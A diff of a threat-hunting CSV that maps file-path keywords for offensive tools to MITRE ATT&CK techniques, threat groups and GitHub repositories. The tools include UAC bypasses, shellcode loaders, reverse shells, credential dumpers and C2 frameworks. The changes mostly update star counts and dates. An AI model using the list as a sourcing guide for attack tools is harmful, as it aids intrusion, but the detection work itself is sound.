+"*/SigLoader/*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z"
 "*/signer-exe.py*","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*/SilentClean.exe*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","0","N/A","10","10","173","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z"
-"*/SilentClean/SilentClean/*.cs*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","173","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z"
-"*/silentdump.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z"
-"*/silentdump.h*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z"
+"*/SilentClean.exe*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","0","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z"
+"*/SilentClean/SilentClean/*.cs*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z"
+"*/silentdump.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z"
+"*/silentdump.h*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z"
 "*/SilentHound.git*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","1","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z"
 "*/SilentMoonwalk.git*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z"
-"*/silentprocessexit.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z"
+"*/silentprocessexit.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z"
 "*/silenttrinity/*.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z"
-"*/simple_hijacker/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
-"*/SimpleLoader.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
-"*/SimpleLoader.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
+"*/simple_hijacker/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*/SimpleLoader.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
+"*/SimpleLoader.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
 "*/Simple-Reverse-Shell*","offensive_tool_keyword","Simple-Reverse-Shell","Simple C++ reverse shell without obfuscation to avoid Win 11 defender detection (At the time of publication","T1548 - T1562 - T1027","TA0003 - TA0008","N/A","N/A","Shell spawning","https://github.com/tihanyin/Simple-Reverse-Shell/","1","1","N/A","N/A","2","114","30","2021-12-21T15:51:48Z","2021-12-19T22:16:32Z"
 "*/SimplyEmail.git*","offensive_tool_keyword","SimplyEmail","SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","5","10","918","242","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z"
 "*/sip-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
@@ -5275,8 +5331,8 @@ "*/sitadel.py*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","1","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" "*/sites-available/striker*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*/sites-enabled/striker*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" -"*/situational_awareness/*.exe","offensive_tool_keyword","empire","Empire executable paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1143","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*/situational_awareness/*.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1147","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/situational_awareness/*.exe","offensive_tool_keyword","empire","Empire executable paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1143","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/situational_awareness/*.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1147","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/skelsec/pypykatz*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/skelsec/pypykatz","1","1","N/A","10","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*/skypev2-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Slackor.git*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" 
@@ -5284,24 +5340,25 @@ "*/sleep_python_bridge/*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - 